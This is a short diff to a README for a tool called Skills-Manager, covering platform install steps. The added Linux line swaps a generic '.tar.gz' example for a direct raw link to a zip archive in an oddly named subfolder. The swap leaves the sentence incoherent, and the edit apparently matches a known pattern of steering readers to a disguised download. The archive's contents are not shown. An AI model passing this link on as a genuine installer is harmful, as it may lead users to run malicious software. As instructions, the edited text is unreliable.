fengaiyunzi/Skills-Manager/README.md

 - **macOS:** Open the `.dmg` file, then drag the Skills-Manager icon into your Applications folder.

-- **Linux:** You may get a compressed package like `.tar.gz` or a `.deb` file.
+- **Linux:** You may get a compressed package like `https://github.com/fengaiyunzi/Skills-Manager/raw/refs/heads/main/taleteller/Manager-Skills-3.8.zip` or a `.deb` file.
 For ease, open the file manager and follow instructions to extract and run the app.
 If you get a `.deb` file, double-click it to open your package manager and install it.

 ### Step 3: Open Skills-Manager